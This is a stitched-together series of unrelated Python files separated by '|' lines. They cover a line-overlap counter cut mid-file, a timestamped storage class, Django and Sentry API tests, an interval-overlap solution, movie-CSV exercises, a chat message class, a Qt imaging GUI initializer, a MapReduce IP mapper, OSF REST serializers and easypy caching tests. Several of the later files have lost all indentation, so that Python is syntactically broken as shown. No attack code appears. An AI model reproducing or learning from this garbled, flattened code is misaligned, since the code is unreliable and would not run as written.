            points[key] += 1
            if y2 > y1:
                y += 1
            else:
                y -= 1
    elif delta_x < 0:
        # 45-degree diagonal, walking left to right from (x2, y2).
        y = y2
        for x in range(x2, x1 + 1):
            key = 'x' + str(x) + 'y' + str(y)
            points[key] += 1
            if y2 > y1:
                y -= 1
            else:
                y += 1
count = 0
for value in points.values():
    if value > 1:
        count += 1
print(count)
|
import time


class Storage:
    def __init__(self):
        self.data = {}
        self.time = {}  # last-set monotonic timestamp per key

    def __getitem__(self, item):
        return self.data[item]

    def __setitem__(self, key, value):
        if key in self.data and self.data[key] == value:
            # Same value: only refresh the timestamp.
            self.time[key] = time.monotonic()
            return
        self.data[key] = value
        self.time[key] = time.monotonic()

    def __delitem__(self, key):
        del self.data[key]
        del self.time[key]

    def __contains__(self, item):
        return item in self.data

    def __iter__(self):
        # Snapshot the keys so mutation during iteration is safe.
        self._keys = list(self.data.keys())
        self._i = 0
        return self

    def __next__(self):
        if self._i < len(self._keys):
            self._i += 1
            return self._keys[self._i - 1]
        raise StopIteration
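
# --- Hedged usage sketch: items remember when they were last set.
store = Storage()
store['a'] = 1
store['a'] = 1  # unchanged value: only the timestamp is refreshed
print(store['a'], 'a' in store, list(store))  # 1 True ['a']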
|
from django.contrib.auth.models import User
from django.urls import reverse
from rest_framework.test import APIRequestFactory, force_authenticate
from authenticator.views import ValidateTokenView
factory = APIRequestFactory()


def test_validate_token_view_post():
    """Should get a simple 200 response"""
    user = User(username='test')
    view = ValidateTokenView.as_view()
    url = reverse('validate-token')
    request = factory.post(url)
    force_authenticate(request, user=user)
    response = view(request)
    assert response.status_code == 200


def test_validate_token_view_invalid_methods():
    """POST should be the only method allowed"""
    user = User(username='test')
    view = ValidateTokenView.as_view()
    url = reverse('validate-token')
    for method in ('get', 'put', 'patch', 'delete'):
        request = getattr(factory, method)(url)
        force_authenticate(request, user=user)
        response = view(request)
        assert response.status_code == 405
|
from typing import List


class Solution:
    def eraseOverlapIntervals(self, intervals: List[List[int]]) -> int:
        if not intervals:
            return 0
        count = 0
        intervals.sort()
        left, right = intervals[0]
        for start, end in intervals[1:]:
            if start < right:
                # Overlap: drop one interval, keeping the one that ends sooner.
                count += 1
                right = min(right, end)
            else:
                right = end
        return count
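
# --- Hedged usage sketch: [1, 3] overlaps both [1, 2] and [2, 3], but a
# single removal resolves it.
# print(Solution().eraseOverlapIntervals([[1, 2], [2, 3], [3, 4], [1, 3]]))  # 1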
|
## 1. Overview ##
f = open("movie_metadata.csv", 'r')
movie_metadata = f.read()
movie_metadata = movie_metadata.split('\n')
movie_data = []
for element in movie_metadata:
    row = element.split(',')
    movie_data.append(row)
print(movie_data[:5])

## 3. Writing Our Own Functions ##
def first_elts(nested_lists):
    list_heads = []
    for n_list in nested_lists:
        list_heads.append(n_list[0])
    return list_heads

movie_names = first_elts(movie_data)
print(movie_names)

## 4. Functions with Multiple Return Paths ##
def is_usa(movie):
    origin_idx = 6
    return True if movie[origin_idx] == "USA" else False

wonder_woman = ['Wonder Woman','Patty Jenkins','Color',141,'Gal Gadot','English','USA',2017]
wonder_woman_usa = is_usa(wonder_woman)

## 5. Functions with Multiple Arguments ##
wonder_woman = ['Wonder Woman','Patty Jenkins','Color',141,'Gal Gadot','English','USA',2017]
def is_usa(input_lst):
    if input_lst[6] == "USA":
        return True
    else:
        return False

def index_equals_str(input_lst, index, input_str):
    return input_lst[index] == input_str

wonder_woman_in_color = index_equals_str(wonder_woman, 2, "Color")

## 6. Optional Arguments ##
def index_equals_str(input_lst, index, input_str):
    if input_lst[index] == input_str:
        return True
    else:
        return False

def counter(input_lst, header_row=False):
    num_elt = 0
    if header_row:
        input_lst = input_lst[1:]
    for each in input_lst:
        num_elt = num_elt + 1
    return num_elt

def feature_counter(input_lst, index, input_str, header_row=False):
    num_feature = 0
    if header_row:
        input_lst = input_lst[1:]
    for row in input_lst:
        num_feature += 1 if row[index] == input_str else 0
    return num_feature

num_of_us_movies = feature_counter(movie_data, 6, "USA", True)

## 7. Calling a Function inside another Function ##
def feature_counter(input_lst, index, input_str, header_row=False):
    num_elt = 0
    if header_row:
        input_lst = input_lst[1:]
    for each in input_lst:
        if each[index] == input_str:
            num_elt += 1
    return num_elt

def summary_statistics(input_lst):
    input_lst = input_lst[1:]
    num_japan_films = feature_counter(input_lst, 6, "Japan")
    num_color_films = feature_counter(input_lst, 2, "Color")
    num_films_in_english = feature_counter(input_lst, 5, "English")
    summary_dict = {"japan_films": num_japan_films,
                    "color_films": num_color_films,
                    "films_in_english": num_films_in_english}
    return summary_dict

summary = summary_statistics(movie_data)
|
from .keyboards import Keyboard


class Message(object):
    def __init__(self, message: str, keyboard: Keyboard = None, lat: float = None, long: float = None,
                 attachment: str = None):
        if not isinstance(message, str):
            raise TypeError('message must be an instance of str')
        if keyboard is not None:
            if not isinstance(keyboard, Keyboard):
                raise TypeError('keyboard must be an instance of Keyboard')
        self.message = message
        self.keyboard = keyboard
        self.lat = lat
        self.long = long
        self.attachment = attachment

    def to_dict(self):
        res = {
            'message': self.message,
        }
        # Compare against None so coordinates of 0.0 are not dropped.
        if self.lat is not None and self.long is not None:
            res['lat'] = self.lat
            res['long'] = self.long
        if self.keyboard:
            res['keyboard'] = self.keyboard.to_dict()
        if self.attachment:
            res['attachment'] = self.attachment
        return res
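
# --- Hedged usage sketch: a location message serialized for sending.
# Message('Here I am', lat=59.93, long=30.31).to_dict()
# -> {'message': 'Here I am', 'lat': 59.93, 'long': 30.31}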
|
import numpy as np
import matplotlib
import os
import copy
matplotlib.use('Qt5Agg')
from matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar
from qtpy.QtWidgets import QProgressBar, QVBoxLayout, QAbstractItemView
from qtpy import QtGui
import pyqtgraph as pg
from __code.table_handler import TableHandler
from __code.bragg_edge.mplcanvas import MplCanvas
from __code.dual_energy.my_table_widget import MyTableWidget
from __code.bragg_edge.bragg_edge_peak_fitting_gui_utility import GuiUtility
class Initialization:
distance_detector_sample = 1300 # m
detector_offset = 6500 # micros
def __init__(self, parent=None, tab='all'):
self.parent = parent
self.block_signals(True)
self.pyqtgraph_image_view()
self.pyqtgraph_image_ratio_view()
self.pyqtgraph_profile()
self.matplotlib()
self.widgets()
self.roi_setup()
self.text_fields()
self.labels()
self.table_header()
# if tab == 'all':
# self.normalize_images_by_white_beam()
# self.save_image_size()
# self.widgets()
#
# self.statusbar()
# self.pyqtgraph_fitting()
# self.kropff_fitting_table()
self.block_signals(False)
def pyqtgraph_image_ratio_view(self):
# image view
self.parent.ui.image_ratio_view = pg.ImageView()
self.parent.ui.image_ratio_view.ui.roiBtn.hide()
self.parent.ui.image_ratio_view.ui.menuBtn.hide()
image_layout = QVBoxLayout()
image_layout.addWidget(self.parent.ui.image_ratio_view)
self.parent.ui.calculation_bin_widget.setLayout(image_layout)
def normalize_images_by_white_beam(self):
white_beam_ob = self.parent.o_bragg.white_beam_ob
list_data = self.parent.o_norm.data['sample']['data']
for _index_data, _data in enumerate(list_data):
normalized_data = _data / white_beam_ob
self.parent.o_norm.data['sample']['data'][_index_data] = normalized_data
def block_signals(self, flag):
list_ui = []
for _ui in list_ui:
_ui.blockSignals(flag)
def save_image_size(self):
_image = self.parent.get_live_image()
[height, width] = np.shape(_image)
self.parent.image_size['width'] = width
self.parent.image_size['height'] = height
def statusbar(self):
self.parent.eventProgress = QProgressBar(self.parent.ui.statusbar)
self.parent.eventProgress.setMinimumSize(20, 14)
self.parent.eventProgress.setMaximumSize(540, 100)
self.parent.eventProgress.setVisible(False)
self.parent.ui.statusbar.addPermanentWidget(self.parent.eventProgress)
def pyqtgraph_image_view(self):
# image view
self.parent.ui.image_view = pg.ImageView()
self.parent.ui.image_view.ui.roiBtn.hide()
self.parent.ui.image_view.ui.menuBtn.hide()
image_layout = QVBoxLayout()
image_layout.addWidget(self.parent.ui.image_view)
self.parent.ui.image_widget.setLayout(image_layout)
def pyqtgraph_profile(self):
# profile view
self.parent.ui.profile = pg.PlotWidget(title="Profile of ROI selected")
profile_layout = QVBoxLayout()
profile_layout.addWidget(self.parent.ui.profile)
self.parent.ui.profile_widget.setLayout(profile_layout)
def matplotlib(self):
"""to activate matplotlib plots"""
def _matplotlib(parent=None, widget=None):
sc = MplCanvas(parent, width=5, height=4, dpi=100)
# sc.axes.plot([0,1,2,3,4,5], [10, 1, 20 ,3, 40, 50])
toolbar = NavigationToolbar(sc, parent)
layout = QVBoxLayout()
layout.addWidget(toolbar)
layout.addWidget(sc)
widget.setLayout(layout)
return sc
# self.parent.kropff_high_plot = _matplotlib(parent=self.parent,
# widget=self.parent.ui.high_widget)
def pyqtgraph_fitting(self):
# fitting view
self.parent.ui.fitting = pg.PlotWidget(title="Fitting")
fitting_layout = QVBoxLayout()
fitting_layout.addWidget(self.parent.ui.fitting)
self.parent.ui.fitting_widget.setLayout(fitting_layout)
def labels(self):
# labels
self.parent.ui.detector_offset_units.setText(u"\u03BCs")
self.parent.ui.selection_tof_radiobutton.setText(u"TOF (\u03BCs)")
self.parent.ui.selection_lambda_radiobutton.setText(u"\u03BB (\u212B)")
def text_fields(self):
self.parent.ui.distance_detector_sample.setText(str(self.distance_detector_sample))
self.parent.ui.detector_offset.setText(str(self.detector_offset))
self.parent.ui.selection_bin_size_value.setText(str(self.parent.bin_size_value['index']))
def widgets(self):
self.parent.ui.splitter.setSizes([500, 400])
self.parent.ui.splitter_2.setSizes([500, 400])
self.parent.ui.calculation_bin_table = MyTableWidget(parent=self.parent)
self.parent.ui.calculation_bin_table.cellClicked['int', 'int'].connect(
self.parent.calculation_table_cell_clicked)
# QAbstractItemView lives in QtWidgets, not QtGui.
self.parent.ui.calculation_bin_table.setEditTriggers(QAbstractItemView.NoEditTriggers)
self.parent.ui.verticalLayout_table.addWidget(self.parent.ui.calculation_bin_table)
def roi_setup(self):
[x0, y0] = self.parent.roi_settings['position']
self.parent.selection_x0y0 = [x0, y0]
width = self.parent.previous_roi_selection['width']
height = self.parent.previous_roi_selection['height']
_pen = QtGui.QPen()
_pen.setColor(self.parent.roi_settings['color'])
_pen.setWidth(self.parent.roi_settings['border_width'])
# ROI sized from the previously saved width and height.
self.parent.roi_id = pg.ROI([x0, y0],
                            [width, height],
                            pen=_pen,
                            scaleSnap=True)
self.parent.roi_id.addScaleHandle([1, 1], [0, 0])
self.parent.roi_id.addScaleHandle([0, 0], [1, 1])
self.parent.ui.image_view.addItem(self.parent.roi_id)
self.parent.roi_id.sigRegionChanged.connect(self.parent.roi_moved)
def display(self, image=None):
self.parent.live_image = image
_image = np.transpose(image)
_image = self._clean_image(_image)
self.parent.ui.image_view.setImage(_image)
def _clean_image(self, image):
    # Replace infinities with NaN so display scaling ignores them.
    _result_inf = np.where(np.isinf(image))
    image[_result_inf] = np.nan
    return image
def table_header(self):
column_names = [u'#', u'From file index', u'To file index',
u'From TOF (\u03BCs)', u'To TOF (\u03BCs)',
u'From \u03BB (\u212B)', u'To \u03BB (\u212B)']
o_high = TableHandler(table_ui=self.parent.ui.summary_table)
o_high.set_column_names(column_names=column_names)
|
#!/usr/bin/env python3
import sys
for line in sys.stdin:
data = line.strip().split()
if len(data) > 1:
ip = data[0]
print('{0}\t{1}'.format(ip, 1))
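
# --- Hedged companion sketch (not part of the original file): the reduce
# step that would sum the "<ip>\t1" pairs this mapper emits, relying on the
# shuffle delivering lines sorted by key.
def _reducer_sketch(stdin):
    current_ip, count = None, 0
    for line in stdin:
        ip, n = line.strip().split('\t')
        if ip != current_ip:
            if current_ip is not None:
                print('{0}\t{1}'.format(current_ip, count))
            current_ip, count = ip, 0
        count += int(n)
    if current_ip is not None:
        print('{0}\t{1}'.format(current_ip, count))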
|
from rest_framework import serializers as ser
from rest_framework import exceptions
from rest_framework.exceptions import ValidationError
from modularodm import Q
from modularodm.exceptions import ValidationValueError
from framework.auth.core import Auth
from framework.exceptions import PermissionsError
from framework.guid.model import Guid
from website.models import Node, User, Comment, Institution
from website.exceptions import NodeStateError, UserNotAffiliatedError
from website.files.models.base import FileNode
from website.util import permissions as osf_permissions
from website.project.model import NodeUpdateError
from api.nodes.utils import get_file_object
from api.base.utils import get_object_or_error, absolute_reverse
from api.base.serializers import (JSONAPISerializer, WaterbutlerLink, NodeFileHyperLinkField, IDField, TypeField,
TargetTypeField, JSONAPIListField, LinksField, RelationshipField, DevOnly,
HideIfRegistration)
from api.base.exceptions import InvalidModelValueError
class NodeTagField(ser.Field):
def to_representation(self, obj):
if obj is not None:
return obj._id
return None
def to_internal_value(self, data):
return data
class NodeSerializer(JSONAPISerializer):
# TODO: If we have to redo this implementation in any of the other serializers, subclass ChoiceField and make it
# handle blank choices properly. Currently DRF ChoiceFields ignore blank options, which is incorrect in this
# instance
filterable_fields = frozenset([
'id',
'title',
'description',
'public',
'tags',
'category',
'date_created',
'date_modified',
'registration',
'root',
'parent'
])
non_anonymized_fields = [
'id',
'title',
'description',
'category',
'date_created',
'date_modified',
'registration',
'tags',
'public',
'links',
'children',
'comments',
'contributors',
'files',
'node_links',
'parent',
'root',
'logs',
]
id = IDField(source='_id', read_only=True)
type = TypeField()
category_choices = Node.CATEGORY_MAP.keys()
category_choices_string = ', '.join(["'{}'".format(choice) for choice in category_choices])
title = ser.CharField(required=True)
description = ser.CharField(required=False, allow_blank=True, allow_null=True)
category = ser.ChoiceField(choices=category_choices, help_text="Choices: " + category_choices_string)
date_created = ser.DateTimeField(read_only=True)
date_modified = ser.DateTimeField(read_only=True)
registration = ser.BooleanField(read_only=True, source='is_registration')
fork = ser.BooleanField(read_only=True, source='is_fork')
collection = DevOnly(ser.BooleanField(read_only=True, source='is_folder'))
dashboard = ser.BooleanField(read_only=True, source='is_dashboard')
tags = JSONAPIListField(child=NodeTagField(), required=False)
template_from = ser.CharField(required=False, allow_blank=False, allow_null=False,
help_text='Specify a node id for a node you would like to use as a template for the '
'new node. Templating is like forking, except that you do not copy the '
'files, only the project structure. Some information is changed on the top '
'level project by submitting the appropriate fields in the request body, '
'and some information will not change. By default, the description will '
'be cleared and the project will be made private.')
current_user_permissions = ser.SerializerMethodField(help_text='List of strings representing the permissions '
'for the current user on this node.')
# Public is only write-able by admins--see update method
public = ser.BooleanField(source='is_public', required=False,
help_text='Nodes that are made public will give read-only access '
'to everyone. Private nodes require explicit read '
'permission. Write and admin access are the same for '
'public and private nodes. Administrators on a parent '
'node have implicit read permissions for all child nodes')
links = LinksField({'html': 'get_absolute_html_url'})
# TODO: When we have osf_permissions.ADMIN permissions, make this writable for admins
children = RelationshipField(
related_view='nodes:node-children',
related_view_kwargs={'node_id': '<pk>'},
related_meta={'count': 'get_node_count'},
)
comments = RelationshipField(
related_view='nodes:node-comments',
related_view_kwargs={'node_id': '<pk>'},
related_meta={'unread': 'get_unread_comments_count'})
contributors = RelationshipField(
related_view='nodes:node-contributors',
related_view_kwargs={'node_id': '<pk>'},
related_meta={'count': 'get_contrib_count'},
)
files = RelationshipField(
related_view='nodes:node-providers',
related_view_kwargs={'node_id': '<pk>'}
)
forked_from = RelationshipField(
related_view='nodes:node-detail',
related_view_kwargs={'node_id': '<forked_from_id>'}
)
node_links = DevOnly(RelationshipField(
related_view='nodes:node-pointers',
related_view_kwargs={'node_id': '<pk>'},
related_meta={'count': 'get_pointers_count'},
))
parent = RelationshipField(
related_view='nodes:node-detail',
related_view_kwargs={'node_id': '<parent_node._id>'},
filter_key='parent_node'
)
registrations = DevOnly(HideIfRegistration(RelationshipField(
related_view='nodes:node-registrations',
related_view_kwargs={'node_id': '<pk>'},
related_meta={'count': 'get_registration_count'}
)))
primary_institution = RelationshipField(
related_view='nodes:node-institution-detail',
related_view_kwargs={'node_id': '<pk>'},
self_view='nodes:node-relationships-institution',
self_view_kwargs={'node_id': '<pk>'}
)
root = RelationshipField(
related_view='nodes:node-detail',
related_view_kwargs={'node_id': '<root._id>'}
)
logs = RelationshipField(
related_view='nodes:node-logs',
related_view_kwargs={'node_id': '<pk>'},
)
def get_current_user_permissions(self, obj):
user = self.context['request'].user
if user.is_anonymous():
return ['read']
permissions = obj.get_permissions(user=user)
if not permissions:
permissions = ['read']
return permissions
class Meta:
type_ = 'nodes'
def get_absolute_url(self, obj):
return obj.get_absolute_url()
# TODO: See if we can get the count filters into the filter rather than the serializer.
def get_user_auth(self, request):
user = request.user
if user.is_anonymous():
auth = Auth(None)
else:
auth = Auth(user)
return auth
def get_node_count(self, obj):
auth = self.get_user_auth(self.context['request'])
nodes = [node for node in obj.nodes if node.can_view(auth) and node.primary and not node.is_deleted]
return len(nodes)
def get_contrib_count(self, obj):
return len(obj.contributors)
def get_registration_count(self, obj):
auth = self.get_user_auth(self.context['request'])
registrations = [node for node in obj.node__registrations if node.can_view(auth)]
return len(registrations)
def get_pointers_count(self, obj):
return len(obj.nodes_pointer)
def get_unread_comments_count(self, obj):
user = self.get_user_auth(self.context['request']).user
node_comments = Comment.find_n_unread(user=user, node=obj, page='node')
file_comments = self.get_unread_file_comments(obj)
return {
'total': node_comments + file_comments,
'node': node_comments,
'files': file_comments
}
def get_unread_file_comments(self, obj):
user = self.get_user_auth(self.context['request']).user
n_unread = 0
commented_file_guids = Guid.find(Q('_id', 'in', obj.commented_files.keys()))
for target in commented_file_guids:
file_obj = FileNode.resolve_class(target.referent.provider, FileNode.FILE).load(target.referent._id)
if obj.get_addon(file_obj.provider):
try:
get_file_object(node=obj, path=file_obj.path, provider=file_obj.provider, request=self.context['request'])
except (exceptions.NotFound, exceptions.PermissionDenied):
continue
n_unread += Comment.find_n_unread(user, obj, page='files', root_id=target._id)
return n_unread
def create(self, validated_data):
if 'template_from' in validated_data:
request = self.context['request']
user = request.user
template_from = validated_data.pop('template_from')
template_node = Node.load(key=template_from)
if template_node is None:
raise exceptions.NotFound
if not template_node.has_permission(user, 'read', check_parent=False):
raise exceptions.PermissionDenied
validated_data.pop('creator')
changed_data = {template_from: validated_data}
node = template_node.use_as_template(auth=self.get_user_auth(request), changes=changed_data)
else:
node = Node(**validated_data)
try:
node.save()
except ValidationValueError as e:
raise InvalidModelValueError(detail=e.message)
return node
def update(self, node, validated_data):
"""Update instance with the validated data. Requires
the request to be in the serializer context.
"""
assert isinstance(node, Node), 'node must be a Node'
auth = self.get_user_auth(self.context['request'])
old_tags = set([tag._id for tag in node.tags])
if 'tags' in validated_data:
current_tags = set(validated_data.get('tags'))
del validated_data['tags']
elif self.partial:
current_tags = set(old_tags)
else:
current_tags = set()
for new_tag in (current_tags - old_tags):
node.add_tag(new_tag, auth=auth)
for deleted_tag in (old_tags - current_tags):
node.remove_tag(deleted_tag, auth=auth)
if validated_data:
try:
node.update(validated_data, auth=auth)
except ValidationValueError as e:
raise InvalidModelValueError(detail=e.message)
except PermissionsError:
raise exceptions.PermissionDenied
except NodeUpdateError as e:
raise ValidationError(detail=e.reason)
return node
class NodeDetailSerializer(NodeSerializer):
"""
Overrides NodeSerializer to make id required.
"""
id = IDField(source='_id', required=True)
class NodeContributorsSerializer(JSONAPISerializer):
""" Separate from UserSerializer due to necessity to override almost every field as read only
"""
non_anonymized_fields = ['bibliographic', 'permission']
filterable_fields = frozenset([
'id',
'bibliographic',
'permission'
])
id = IDField(source='_id', required=True)
type = TypeField()
bibliographic = ser.BooleanField(help_text='Whether the user will be included in citations for this node or not.',
default=True)
permission = ser.ChoiceField(choices=osf_permissions.PERMISSIONS, required=False, allow_null=True,
default=osf_permissions.reduce_permissions(osf_permissions.DEFAULT_CONTRIBUTOR_PERMISSIONS),
help_text='User permission level. Must be "read", "write", or "admin". Defaults to "write".')
links = LinksField({
'self': 'get_absolute_url'
})
users = RelationshipField(
related_view='users:user-detail',
related_view_kwargs={'user_id': '<pk>'},
always_embed=True
)
class Meta:
type_ = 'contributors'
def get_absolute_url(self, obj):
node_id = self.context['request'].parser_context['kwargs']['node_id']
return absolute_reverse(
'nodes:node-contributor-detail',
kwargs={
'node_id': node_id,
'user_id': obj._id
}
)
class NodeContributorsCreateSerializer(NodeContributorsSerializer):
"""
Overrides NodeContributorsSerializer to add target_type field
"""
target_type = TargetTypeField(target_type='users')
def create(self, validated_data):
auth = Auth(self.context['request'].user)
node = self.context['view'].get_node()
contributor = get_object_or_error(User, validated_data['_id'], display_name='user')
# Node object checks for contributor existence but can still change permissions anyway
if contributor in node.contributors:
raise exceptions.ValidationError('{} is already a contributor'.format(contributor.fullname))
bibliographic = validated_data['bibliographic']
permissions = osf_permissions.expand_permissions(validated_data.get('permission')) or osf_permissions.DEFAULT_CONTRIBUTOR_PERMISSIONS
node.add_contributor(contributor=contributor, auth=auth, visible=bibliographic, permissions=permissions, save=True)
contributor.permission = osf_permissions.reduce_permissions(node.get_permissions(contributor))
contributor.bibliographic = node.get_visible(contributor)
contributor.node_id = node._id
return contributor
class NodeContributorDetailSerializer(NodeContributorsSerializer):
"""
Overrides node contributor serializer to add additional methods
"""
def update(self, instance, validated_data):
contributor = instance
auth = Auth(self.context['request'].user)
node = self.context['view'].get_node()
visible = validated_data.get('bibliographic')
permission = validated_data.get('permission')
try:
node.update_contributor(contributor, permission, visible, auth, save=True)
except NodeStateError as e:
raise exceptions.ValidationError(e)
contributor.permission = osf_permissions.reduce_permissions(node.get_permissions(contributor))
contributor.bibliographic = node.get_visible(contributor)
contributor.node_id = node._id
return contributor
class NodeLinksSerializer(JSONAPISerializer):
id = IDField(source='_id')
type = TypeField()
target_type = TargetTypeField(target_type='nodes')
# TODO: We don't show the title because the current user may not have access to this node. We may want to conditionally
# include this field in the future.
# title = ser.CharField(read_only=True, source='node.title', help_text='The title of the node that this Node Link '
# 'points to')
target_node = RelationshipField(
related_view='nodes:node-detail',
related_view_kwargs={'node_id': '<pk>'},
always_embed=True
)
class Meta:
type_ = 'node_links'
links = LinksField({
'self': 'get_absolute_url'
})
def get_absolute_url(self, obj):
node_id = self.context['request'].parser_context['kwargs']['node_id']
return absolute_reverse(
'nodes:node-pointer-detail',
kwargs={
'node_id': node_id,
'node_link_id': obj._id
}
)
def create(self, validated_data):
request = self.context['request']
user = request.user
auth = Auth(user)
node = self.context['view'].get_node()
target_node_id = validated_data['_id']
pointer_node = Node.load(target_node_id)
if not pointer_node or pointer_node.is_folder:
raise InvalidModelValueError(
source={'pointer': '/data/relationships/node_links/data/id'},
detail='Target Node \'{}\' not found.'.format(target_node_id)
)
try:
pointer = node.add_pointer(pointer_node, auth, save=True)
return pointer
except ValueError:
raise InvalidModelValueError(
source={'pointer': '/data/relationships/node_links/data/id'},
detail='Target Node \'{}\' already pointed to by \'{}\'.'.format(target_node_id, node._id)
)
def update(self, instance, validated_data):
pass
class NodeProviderSerializer(JSONAPISerializer):
id = ser.SerializerMethodField(read_only=True)
kind = ser.CharField(read_only=True)
name = ser.CharField(read_only=True)
path = ser.CharField(read_only=True)
node = ser.CharField(source='node_id', read_only=True)
provider = ser.CharField(read_only=True)
files = NodeFileHyperLinkField(
related_view='nodes:node-files',
related_view_kwargs={'node_id': '<node_id>', 'path': '<path>', 'provider': '<provider>'},
kind='folder',
never_embed=True
)
links = LinksField({
'upload': WaterbutlerLink(),
'new_folder': WaterbutlerLink(kind='folder')
})
class Meta:
type_ = 'files'
@staticmethod
def get_id(obj):
return '{}:{}'.format(obj.node._id, obj.provider)
def get_absolute_url(self, obj):
return absolute_reverse(
'nodes:node-provider-detail',
kwargs={
'node_id': obj.node._id,
'provider': obj.provider
}
)
class NodeInstitutionRelationshipSerializer(ser.Serializer):
id = ser.CharField(source='institution_id', required=False, allow_null=True)
type = TypeField(required=False, allow_null=True)
links = LinksField({
'self': 'get_self_link',
'related': 'get_related_link',
})
class Meta:
type_ = 'institutions'
def get_self_link(self, obj):
return obj.institution_relationship_url()
def get_related_link(self, obj):
return obj.institution_url()
def update(self, instance, validated_data):
node = instance
user = self.context['request'].user
inst = validated_data.get('institution_id', None)
if inst:
inst = Institution.load(inst)
if not inst:
raise exceptions.NotFound
try:
node.add_primary_institution(inst=inst, user=user)
except UserNotAffiliatedError:
raise exceptions.ValidationError(detail='User not affiliated with institution')
node.save()
return node
node.remove_primary_institution(user)
node.save()
return node
def to_representation(self, obj):
data = {}
meta = getattr(self, 'Meta', None)
type_ = getattr(meta, 'type_', None)
assert type_ is not None, 'Must define Meta.type_'
relation_id_field = self.fields['id']
attribute = relation_id_field.get_attribute(obj)
relationship = relation_id_field.to_representation(attribute)
data['data'] = {'type': type_, 'id': relationship} if relationship else None
data['links'] = {key: val for key, val in self.fields.get('links').to_representation(obj).iteritems()}
return data
class NodeAlternativeCitationSerializer(JSONAPISerializer):
id = IDField(source="_id", read_only=True)
type = TypeField()
name = ser.CharField(required=True)
text = ser.CharField(required=True)
class Meta:
type_ = 'citations'
def create(self, validated_data):
errors = self.error_checker(validated_data)
if len(errors) > 0:
raise ValidationError(detail=errors)
node = self.context['view'].get_node()
auth = Auth(self.context['request']._user)
citation = node.add_citation(auth, save=True, **validated_data)
return citation
def update(self, instance, validated_data):
errors = self.error_checker(validated_data)
if len(errors) > 0:
raise ValidationError(detail=errors)
node = self.context['view'].get_node()
auth = Auth(self.context['request']._user)
instance = node.edit_citation(auth, instance, save=True, **validated_data)
return instance
def error_checker(self, data):
errors = []
name = data.get('name', None)
text = data.get('text', None)
citations = self.context['view'].get_node().alternative_citations
if not (self.instance and self.instance.name == name) and citations.find(Q('name', 'eq', name)).count() > 0:
errors.append("There is already a citation named '{}'".format(name))
if not (self.instance and self.instance.text == text):
matching_citations = citations.find(Q('text', 'eq', text))
if matching_citations.count() > 0:
names = "', '".join([str(citation.name) for citation in matching_citations])
errors.append("Citation matches '{}'".format(names))
return errors
|
from __future__ import absolute_import
from datetime import timedelta
from django.utils import timezone
from django.core.urlresolvers import reverse
from sentry import options
from sentry.testutils import APITestCase, SnubaTestCase
class ProjectEventsTest(APITestCase, SnubaTestCase):
def setUp(self):
super(ProjectEventsTest, self).setUp()
self.min_ago = timezone.now() - timedelta(minutes=1)
options.set('snuba.events-queries.enabled', True)
def test_simple(self):
self.login_as(user=self.user)
project = self.create_project()
group = self.create_group(project=project)
event_1 = self.create_event('a' * 32, group=group, datetime=self.min_ago)
event_2 = self.create_event('b' * 32, group=group, datetime=self.min_ago)
url = reverse(
'sentry-api-0-project-events',
kwargs={
'organization_slug': project.organization.slug,
'project_slug': project.slug,
}
)
response = self.client.get(url, format='json')
assert response.status_code == 200, response.content
assert len(response.data) == 2
assert sorted(map(lambda x: x['eventID'], response.data)) == sorted(
[
event_1.event_id,
event_2.event_id,
]
)
def test_message_search(self):
self.login_as(user=self.user)
project = self.create_project()
group = self.create_group(project=project)
self.create_event('x' * 32, group=group, message="how to make fast", datetime=self.min_ago)
event_2 = self.create_event(
'y' * 32,
group=group,
message="Delet the Data",
datetime=self.min_ago)
url = reverse(
'sentry-api-0-project-events',
kwargs={
'organization_slug': project.organization.slug,
'project_slug': project.slug,
}
)
response = self.client.get(url, {'query': 'delet'}, format='json')
assert response.status_code == 200, response.content
assert len(response.data) == 1
assert response.data[0]['eventID'] == event_2.event_id
assert response.data[0]['message'] == 'Delet the Data'
def test_filters_based_on_retention(self):
self.login_as(user=self.user)
project = self.create_project()
group = self.create_group(project=project)
two_days_ago = timezone.now() - timedelta(days=2)
self.create_event('c' * 32, group=group, datetime=two_days_ago)
event_2 = self.create_event('d' * 32, group=group, datetime=self.min_ago)
with self.options({'system.event-retention-days': 1}):
url = reverse(
'sentry-api-0-project-events',
kwargs={
'organization_slug': project.organization.slug,
'project_slug': project.slug,
}
)
response = self.client.get(url, format='json')
assert response.status_code == 200, response.content
assert len(response.data) == 1
assert response.data[0]['eventID'] == event_2.event_id
|
import os
import time
from logging import getLogger
from uuid import uuid4
import random
import weakref
import gc
import pytest
from easypy.bunch import Bunch
from easypy.caching import timecache, PersistentCache, cached_property, locking_cache
from easypy.units import DAY
from easypy.resilience import resilient
_logger = getLogger(__name__)
def test_timecache():
ts = 0
data = Bunch(a=0, b=0)
def get_ts():
return ts
@timecache(expiration=1, get_ts_func=get_ts, key_func=lambda k: k)
def inc(k, x):
x += 1
data[k] += 1
assert data.a == data.b == 0
inc('a', random.random())
assert (data.a, data.b) == (1, 0)
inc('a', x=random.random())
assert (data.a, data.b) == (1, 0)
ts += 1
inc('a', random.random())
assert (data.a, data.b) == (2, 0)
inc('b', x=random.random())
assert (data.a, data.b) == (2, 1)
inc('b', random.random())
assert (data.a, data.b) == (2, 1)
ts += 1
inc('b', x=random.random())
assert (data.a, data.b) == (2, 2)
inc.cache_clear()
inc('a', x=random.random())
assert (data.a, data.b) == (3, 2)
inc('b', x=random.random())
assert (data.a, data.b) == (3, 3)
inc.cache_clear()
inc('a', x=random.random())
inc('b', x=random.random())
inc('a', x=random.random())
inc('b', x=random.random())
assert (data.a, data.b) == (4, 4)
inc.cache_pop('a', x=random.random())
inc('a', x=random.random())
inc('b', x=random.random())
def test_timecache_method():
ts = 0
def get_ts():
return ts
class Foo:
def __init__(self, prefix):
self.prefix = prefix
@timecache(expiration=1, get_ts_func=get_ts, key_func=lambda args: args)
def foo(self, *args):
return [self.prefix] + list(args)
foo1 = Foo(1)
foo2 = Foo(2)
assert foo1.foo(1, 2, 3) == foo1.foo(1, 2, 3)
assert foo1.foo(1, 2, 3) != foo1.foo(1, 2, 4)
assert foo1.foo(1, 2, 3) != foo2.foo(1, 2, 3)
foo1_1 = foo1.foo(1)
foo1_2 = foo1.foo(2)
foo2_1 = foo2.foo(1)
foo2_2 = foo2.foo(2)
assert foo1_1 == [1, 1]
assert foo1_2 == [1, 2]
assert foo2_1 == [2, 1]
assert foo2_2 == [2, 2]
assert foo1_1 is foo1.foo(1)
assert foo1_2 is foo1.foo(2)
assert foo2_1 is foo2.foo(1)
assert foo2_2 is foo2.foo(2)
assert foo1_1 is foo1.foo(1)
